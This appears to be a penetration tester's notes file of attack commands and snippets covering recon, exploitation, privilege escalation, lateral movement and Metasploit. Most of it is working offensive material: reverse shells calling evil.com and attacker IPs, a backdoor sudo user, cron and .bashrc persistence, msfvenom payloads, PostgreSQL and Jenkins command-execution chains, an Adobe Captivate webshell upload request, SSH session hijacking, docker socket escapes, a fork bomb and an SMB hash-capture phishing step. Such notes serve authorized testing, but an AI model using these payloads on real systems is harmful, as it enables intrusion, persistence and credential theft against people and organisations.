Pentesting notes and snippets

Recon

DNS Recon

https://github.com/aboul3la/Sublist3r
https://github.com/mschwager/fierce

Aquatone

https://github.com/michenriksen/aquatone
Start with discovery:

aquatone-discover --domain <target> --threads 25

Next run the scanning phase:

aquatone-scan --domain <target> --threads 25

Finish with gathering:

aquatone-gather --domain <target> --threads 25

Gathering on OSX:

Xvfb & aquatone-gather --domain <target> --threads 25

https://github.com/jhaddix/domain

Eyewitness

Single target as command line arg

Run from docker container, output results to ~/EyeWitness/results:

docker run --rm -it -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix -v ~/EyeWitness:/tmp/EyeWitness eyewitness --single http://www.google.com --headless

Read targets out of a file

  1. Put your targets in ~/EyeWitness/urls.txt
  2. Run the following command:
docker run --rm -it -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix -v ~/eyewitness:/tmp/EyeWitness eyewitness -f /tmp/EyeWitness/urls.txt --headless
  1. The Results will be in ~/EyeWitness/results.

Nmap

Host discovery

nmap -sP -oA onlineHosts <ip range>/<subnet mask>

Detailed scan

nmap -T4 -A -v -oA detailedScanResults <ip range>/subnet<mask>

-T4: Aggressive
-A: Enable OS detection, version detection, script scanning, and traceroute
-v: Increase verbosity of output

Single host TCP scan:

nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oA <output filename> <target>

Detailed single host TCP scan:

nmap -nvv -Pn -sSV -T1 -p$(cat <file from single host tcp scan>.xml | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -A -oA <output filename DETAILED> <target>

Single host UDP scan:

nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oA <output filename> <target>

Scan all 65535 ports

-p-

Responder

Responder can be a great tool to collect password hashes, and give you a starting point for gaining access to a system on the network.

Here's one such scenario:
https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html

Exploitation

Reverse shell in Scala:

import sys.process._
"nc -e /bin/sh evil.com 8080" !!;

Once you have the shell, run the following for a full fledged shell:

python -c 'import pty;pty.spawn("/bin/bash")'

Very helpful resource for testing: https://www.tutorialspoint.com/compile_scala_online.php

Post Exploitation

Linux

Access a user's env

This is incredibly useful when you find that users are storing credentials in their environment variables.
sudo su - <username>
env

Search for config files which may have cleartext passwords in them:

# This command works on linux and OSX
du -a $directory | awk '{print $2}' | grep '\.conf$'

Netcat reverse shell without -e

Create listener:
nc -lvp [port]

On the victim:

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc [attacker] [port] 1>/tmp/backpipe

Resource: https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/

Transfer file via netcat

On host to receive file:

nc -lvp [some port] > .evil.file

On host to send file

nc -w 3 [host receiving file] [some port] < evil.file

If the file is a reverse shell be sure to make it an executable on the system:

chmod +x .evil.file

Resource: https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/

Introduce backdoor user

# Create evil user
useradd evil -s /bin/bash -m
# Change evil user's password
echo -e "evilpass\nevilpass" | passwd evil
# Add evil user to sudoers
echo 'evil ALL=(ALL:ALL) ALL' >> /etc/sudoers
# Give evil user ssh access
echo -e "PasswordAuthentication yes\nAllowUsers evil" >> /etc/ssh/sshd_config

To delete the backdoored user:

# Delete evil user
userdel evil
# Delete evil user from sudoers
sed -i '/evil ALL=(ALL:ALL) ALL/d' /etc/sudoers
# Delete evil user from ssh access
sed -i '/^PasswordAuthentication yes/d' /etc/ssh/sshd_config && sed -i '/^AllowUsers evil/d' /etc/ssh/sshd_config

Unix-privesc-check

Find misconfigurations, files with open permissions, etc.
Video Reference

Download it:

wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh -O /tmp/upc.sh

-or-

Download and run privesc-check.sh, save output to a file, and clean up (standard):

wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz && cd /tmp && tar -xvf unix-privesc-check-1.4.tar.gz && bash /tmp/unix-privesc-check-1.4/unix-privesc-check standard | tee /tmp/output2.txt && rm /tmp/unix-privesc-check-1.4.tar.gz && rm -rf /tmp/unix-privesc-check-1.4

-or-

Download and run privesc-check.sh, save output to a file, and clean up (detailed):

wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz && cd /tmp && tar -xvf unix-privesc-check-1.4.tar.gz && bash /tmp/unix-privesc-check-1.4/unix-privesc-check detailed | tee /tmp/output2.txt && rm /tmp/unix-privesc-check-1.4.tar.gz && rm -rf /tmp/unix-privesc-check-1.4

LinEnum

Another good one to find misconfigurations, files with open permissions, etc.

Download it:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/linenum.sh

-or-

Download and run linenum, save output to a file:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/linenum.sh && bash /tmp/linenum.sh | tee /tmp/output.txt

Linuxprivchecker

Download and run linuxprivchecker.py, save output to a file:

wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py -O /tmp/lpc.py && python /tmp/lpc.py | tee /tmp/output1.txt

If there are services running as privileged user, try to find existing exploits.

Good linux post exploitation resource

https://www.youtube.com/watch?v=oYHAi0cgur4

Who has logged in previously?

who, w, last

Are you in the sudoers file?

sudo -l, cat /etc/sudoers

Get network information, like open ports and their associated processes:

netstat -antup
lsof -i

Find programs with root privs:

find / -perm -04000 > programsWithRootAccess.txt

Screenshot the targets screen when you're ssh'ed into a system:

DISPLAY=:0 import -window root screenshot.jpg

Resource: https://github.com/jmatt-io/ANL-CDC/blob/master/ubuntu_ftp_secure.sh

SUID Executables

Look for SUID files:

find / -perm -u=s -type f 2>/dev/null

https://pentestlab.blog/tag/privilege-escalation/

Cracking hashes

Identify what type of hash it is with Hash ID. Once you've done this, crack it with hashcat, john, etc.

For cracking hashes in /etc/shadow

https://www.cyberciti.biz/faq/understanding-etcshadow-file/

Resource: https://www.youtube.com/watch?v=CuBX3sBeGSw

Lateral Movement

Hijacking SSH with Master Mode

Copy this into ~/.ssh/config for a given compromised user:

Host *
ControlMaster auto
ControlPath ~/.ssh/sockets/ssh-%r@%h:%p
ControlPersist yes

Also run this command:

mkdir ~/.ssh/sockets

Now you simply need to wait for the compromised user to ssh to another host. Once this happens, you should be able to ssh to that system without a password as that user.

Resources

https://www.defcon.org/images/defcon-15/dc15-presentations/Moore_and_Valsmith/Whitepaper/dc-15-moore_and_valsmith-WP.pdf

Docker

If you find port 2375 open on a system:

docker -H tcp://<ip of target>:2375 <docker command>

For example, to list the containers on that system:

docker -H tcp://<ip of target>:2375 ps -a

To connect to an existing container:

docker -H tcp://<ip of target>:2375 exec -it <target container> /bin/bash

To create and run a container with the host's root volume mounted:

docker -H tcp://<ip of target>:2375 run --rm -it -v /:/host ubuntu:latest chroot /host /bin/bash

To avoid having to load up a new image (assuming ubuntu:latest isn't already installed), use docker -H tcp://<ip of target>:2375 image ls to find an existing image to use.

To create a vulnerable example:

docker run -it --name=really_freaking_vulnerable_ubuntu -v /var/run/docker.sock:/var/run/docker.sock ubuntu

If you land on a container as root and you have write access to the docker socket:

# Check if you have write access:
ls -lart /var/run/docker.sock
srw-rw---- 1 root root 0 May  6 05:25 /var/run/docker.sock

Install docker:

# Ubuntu or Debian
apt update && apt install -y wget && wget -qO- https://get.docker.com | sh

Once that's installed, find an image to use with docker images, or use something simple like ubuntu:latest:
docker run -it -v /:/host <docker image to use> chroot /host /bin/bash

Alternatively, you can use the docker socket to avoid installing docker:

# Get images
curl --unix-socket /var/run/docker.sock http://docker/images/json
# Get containers
curl --unix-socket /var/run/docker.sock http://docker/containers/json

Proof of concept for exploitation: https://gitlab.com/Creased/docker-shadow/tree/master

However, this will still need to be done as the root user.

Resources

https://gitlab.com/Creased/vulnhub-docker-writeup
https://www.lvh.io/posts/dont-expose-the-docker-socket-not-even-to-a-container.html
https://www.youtube.com/watch?v=GeEW-e4LaT4&list=PLbZzXF2qC3RuL2K7KQVHe0aqdXbZC9Lnz&index=4
https://forums.docker.com/t/api-via-socket-returns-page-not-found/24682/5

Miscellaneous

Test out of bound code execution with tcpdump

Use this:
tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo -vv
in conjuction with a ping command.

Enable ssh on Kali

In /etc/ssh/sshd_config change PermitRootLogin without-password to PermitRootLogin yes
Resource: https://www.drchaos.com/enable-ssh-on-kali-linux-enable-ssh-on-kali-linux/

Command line vnc viewer on kali

vncviewer [target]::[vnc port]

Crash system as normal user with fork bomb

forkbomb(){ forkbomb | forkbomb & }; forkbomb

Resource: https://linuxconfig.org/how-to-crash-your-linux-system-with-fork-bomb

Brute force basic auth page with Hydra

hydra -V -L <list with usernames to try> -P <list with passwords to try> <target site> http-get /<path to page with auth>

Getting a shell on a PostgreSQL DB running on Linux if you have the proper access and permissions

Start by setting up a listener:

nc -lvp 8080

Connect to the postgresql DB:

psql -h <ip with db> -U <db username>

Review the access your user has with the \du command. Alternatively, you can go in blind and run a quick test (or run a test after you've established you have the proper access and permissions to do so):

CREATE OR REPLACE FUNCTION exec() RETURNS text AS $BODY$ BEGIN DROP TABLE IF EXISTS bDGhLsYPcd; CREATE TEMP TABLE bDGhLsYPcd (INPUT TEXT); COPY bDGhLsYPcd FROM PROGRAM 'pwd'; RETURN NULL; END; $BODY$ LANGUAGE plpgsql; SELECT * FROM exec(); SELECT * FROM bDGhLsYPcd;

This should give you the working directory the database is running on if all went well.

Next, get your reverse shell loaded up:

CREATE OR REPLACE FUNCTION exec() RETURNS text AS $BODY$ BEGIN DROP TABLE IF EXISTS bDGhLsYPcd; CREATE TEMP TABLE bDGhLsYPcd (INPUT TEXT); COPY bDGhLsYPcd FROM PROGRAM 'echo "bash -i >& /dev/tcp/<attack machines ip address>/8080 0>&1" >> /tmp/unfriendly.sh'; RETURN NULL; END; $BODY$ LANGUAGE plpgsql; SELECT * FROM exec(); SELECT * FROM bDGhLsYPcd;

Execute it:

CREATE OR REPLACE FUNCTION exec() RETURNS text AS $BODY$ BEGIN DROP TABLE IF EXISTS bDGhLsYPcd; CREATE TEMP TABLE bDGhLsYPcd (INPUT TEXT); COPY bDGhLsYPcd FROM PROGRAM 'bash /tmp/unfriendly.sh'; RETURN NULL; END; $BODY$ LANGUAGE plpgsql; SELECT * FROM exec(); SELECT * FROM bDGhLsYPcd;

You should have your shell.

Getting around "su: must be run from a terminal"

python -c 'import pty;pty.spawn("/bin/bash")'

Getting a shell on a Jenkins box running on Linux or OS X with access to the groovy console

Start by setting up a listener:

nc -lvp 8080

Set up a webserver using nginx, XAMPP, etc. and host a payload that could look something like this:

bash -i >& /dev/tcp/<attackers ip>/8080 0>&1

Download your reverse shell payload:

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "curl http://<attackers ip>/unfriendly.sh --output /tmp/shell".execute()
# You could also use wget
# def proc = "wget http://<attackers ip>/unfriendly.sh -O /tmp/shell".execute()
# Use --proxy=off with wget if your proxy is messing with your ability to get that code
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out&gt; $sout err&gt; $serr"

Make sure your payload is on the target system:

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "ls /tmp".execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out&gt; $sout err&gt; $serr"

Run the payload:

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "bash /tmp/shell".execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out&gt; $sout err&gt; $serr"

You should have your shell.

Metasploit

Run exploit in the background:
exploit -j
Do not interact with a session after successful exploitation of a target:
exploit -z
You can combine them:
exploit -j -z
Persist listener if a meterpreter session dies:
set ExitOnSession false

MSFVenom

http://netsec.ws/?p=331

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

To persist the file once you've uploaded it to your target in ~/.bashrc:

echo "~/.evil.file &" >> ~/.bashrc

For good measure, throw up a cronjob for every 5 minutes as well:

# write out current crontab
crontab -l > mycron
# echo new cron into cron file
echo "*/5 * * * * ~/.evil.file" >> mycron
# install new cron file
crontab mycron
rm mycron

Resource: https://stackoverflow.com/questions/878600/how-to-create-a-cron-job-using-bash-automatically-without-the-interactive-editor

Create and run listener

Create linux_rev.rc file:

use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST [listener ip]
set ExitOnSession false
exploit -j -z

Run it:

msfconsole -r linux_rev.rc

64-bit exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=4444 -f exe -o evil.exe

exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=445 -f exe -o friendly.exe

exe-service

Useful when you need a running service, like for unquoted service path vulnerabilities.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=445 -f exe-service -o friendly.exe

PHP Reverse shell payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=4444 -e php/base64 -f raw > evil_file.php && sed -i '1s/^/<?php\n/' evil_file.php && sed -i -e '$a\?>' evil_file.php

PHP bind payload

msfvenom -p php/meterpreter/bind_tcp LPORT=4444 > msf_bind_shell.php

After starting the listener, upload the php code to the target server. Be sure to replace the /*<?php /**/ with <?php at the top of the file, and replace the % at the end of the file with ?>.

Once the file is uploaded, open the file on the target server. Follow this with an exploit in metasploit.

Evil encoded x64 aspx shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=4444 -e x64/xor -f aspx > shell64.aspx

Jar reverse shell

msfvenom -p java/meterpreter/reverse_tcp LHOST=<local host ip> -f raw -o /tmp/java.jar

Start listener:

msfconsole
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST <local host ip>
set ExitOnSession false
exploit -j -z

Resources

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://hackernoon.com/reverse-shell-cf154dfee6bd

Powershell payload

msfvenom -p cmd/windows/reverse_powershell LHOST=<local host ip> LPORT=445 -o friendly.bat

Start listener:

msfconsole
use exploit/multi/handler
set PAYLOAD cmd/windows/reverse_powershell
set LHOST <local host ip>
set LPORT 445
set ExitOnSession false
exploit -j -z

Copy the evil code:

# On the linux machine
cat friendly.bat

Start powershell on victim:

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe

Paste the evil code into the powershell terminal, or create a .bat file and run it.

Bash Reverse shell

exec 5<>/dev/tcp/<evil ip>/4444;cat <&5 | while read line; do $line 2>&5 >&5; done 

Another similar option:

exec 5<>/dev/tcp/<evil ip>/4444;while read line 0<&5; do $line 2>&5 >&5; done

Basic:

bash -i >& /dev/tcp/<evil ip>/4444 0>&1

Netcat reverse shell

On evil server: nc -lvp <port>
On victim: nc <evil server> <port> -e sh &

Resource: docker start -ai

Create RC Listener

You can create an rc file so you don't need to type the commands into msfconsole every time to interact with your payload.

Create the file:

touch listener.rc

In listener.rc:

use exploit/multi/handler
set payload <payload>
set LHOST <host running metasploit>
set LPORT <port>
exploit -j -z

Run the rc file:

msfconsole -r listener.rc

Capture NTLM Hash with Metasploit

Start the smb capture server:

use auxiliary/server/capture/smb
run

Get victim to connect via smb.
If they need help via phish and they're on a mac, have them open Finder, Command+k, and then type in the following:

smb://<evil server ip>

Making Firefox horribly insecure for quick and dirty proof of concepts

  1. Browse to about:config
  2. Type in security.file
  3. Double click
    security.fileuri.strict_origin_policy

This will disable the same origin policy blocks.

  1. Browse to about:config
  2. Type in security.file
  3. Double click
    security.insecure_field_warning.contextual.enabled

This will disable the "this connection is not secure" messages.

  1. Browse to about:config
  2. Type in mixed
  3. Double click security.mixed_content.block_active_content

This will disable the block active content lock.

Obviously you want to undo these changes once you've finished your POC's.

Find logs on a linux system

find . -type f -name "*.log"

Adobe Captivate Quiz Reporting Feature 'internalServerReporting.php' File Upload RCE Webshell

Using Burp, intercept a GET request to the target and throw it into repeater. Next, right click and Change request method to POST.

Here's what the request should look like:

POST /internalServerReporting.php HTTP/1.1
Host: <target running adobe captivate>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, sdch
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

CompanyName=.&DepartmentName=.&CourseName=.&Filename=test.php&Filedata=<?php

if(isset($_REQUEST['cmd'])){
	echo "<pre>";
	$cmd =($_REQUEST['cmd']);
	system($cmd);
	echo "</pre>";
	die;
}

?>

Once you've sent it and gotten a 200 back, you can access the web shell like so:

http://<target running adobe captivate>/CaptivateResults/test.php?cmd=<your command to run>

Don't forget to clean it up when you're done:

http://<target running adobe captivate>/CaptivateResults/test.php?cmd=del test.php

With Metasploit:
https://hydrasky.com/network-security/create-a-web-backdoor-payload-with-metasploit/
Create the payload:

msfvenom -p php/meterpreter/bind_tcp LPORT=4000 > backdoor.php
In php_listener.rc:

use exploit/multi/handler
set payload <payload>
set LHOST <host running metasploit>
set LPORT 4444

Run the rc file:

msfconsole -r php_listener.rc

Upload the php code to the target server. I made sure to replace the /*<?php /**/ with <?php at the top of the file, and replaced the % at the end of the file with a ?> before doing so with Burp repeater.

Once the file is uploaded, open the file on the target server. Follow this with an exploit in metasploit.

You should have a shell at this point.

Maybe give this a shot https://dl.packetstormsecurity.net/papers/attack/root3.pdf

Windows Post Exploitation Techniques

A couple of things to try below.

# whoami
echo %USERDOMAIN%\%USERNAME%
# create user && add to Administrators
net user <username> <password> /ADD
net localgroup Administrators <username> /ADD
# list local admins
net localgroup administrators
# Look for passwords in txt, xml && xls files
findstr /si password *.txt| *.xml| *.xls
# Show open ports
netstat -bano
# Get list of domain admins
net group "Domain Admins" /domain

Enumerate missing patches on a windows machine with msf

post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester

Check for weak service permissions with accesschk (part of sysinternals)

Video reference

Information on how to download sysinternals using powershell can be found here.

accesschk.exe -qwcu "Authenticated Users" * /accepteula
accesschk.exe -qwcu "Users" * /accepteula
accesschk.exe -qwcu "Everyone" * /accepteula

Once one has been found, modify the binpath to point to the net user bin to create a rogue user:

sc config <vuln service> binpath= "net user <username> <password> /add"

Restart it:

sc start <vuln service>

Add that user to the administrators group:

sc config <vuln service> binpath= "net localgroup administrators <username> /add"

Restart it again:

sc start <vuln service>

Check for weak file permissions with accesschk (part of sysinternals)

Video reference

Information on how to download sysinternals using powershell can be found here.

accesschk.exe -qwsu "Authenticated Users" * /accepteula
accesschk.exe -qwsu "Users" * /accepteula
accesschk.exe -qwsu "Everyone" * /accepteula

Always install elevated privilege escalation

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Use metasploit if they set to exploit:

use exploit/windows/local/always_install_elevated
set LPORT 443
exploit

Use sessiongopher to find saved session info for RAT's

Grab it:

(New-Object System.Net.WebClient).DownloadFile("https://github.com/fireeye/SessionGopher/blob/master/SessionGopher.ps1","C:\Temp\SessionGopher.ps1")

Run it:

Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Thorough

Ghetto Windows WGET using cmd

bitsadmin /transfer myDownloadJob /download /priority normal http://<evil server>/evil.exe c:\temp\evil.exe

Upload stuff to a Windows machine via RDP

http://haacked.com/archive/2010/05/18/remote-desktop-file-copy.aspx/

Empire

Launch the docker container:

# Create a volume to store empire data in
docker create -v /opt/Empire --name data empireproject/empire
# Run the empire container
docker run -ti --volumes-from data -p <host ip>:80:80 empireproject/empire

Resource: http://blog.obscuritylabs.com/docker-command-controll-c2/
Create a listener:

listeners
uselistener http

Resource: http://ethicalhackingblog.com/hacking-powershell-empire-2-0/

POC creation

Unquoted Service Paths

Coldfusion resources

https://nets.ec/Coldfusion_hacking
http://breenmachine.blogspot.com/2013/03/cool-coldfusion-post-exploitation.html
https://github.com/reider-roque/pentest-tools/blob/master/shells/webshell.cfm

Resources

https://netsec.ws/?p=331
https://trustfoundry.net/practical-guide-to-exploiting-the-unquoted-service-path-vulnerability-in-windows/
https://www.gracefulsecurity.com/privesc-unquoted-service-path/
https://www.youtube.com/watch?v=PC_iMqiuIRQ
http://thepcn3rd.blogspot.com/2015/03/utilizing-powerupps1-to-escalate.html
https://twitter.com/1njected/status/875701296325697536

Setting up cloud cracking machine with Kali

https://www.kali.org/news/cloud-cracking-with-cuda-gpu/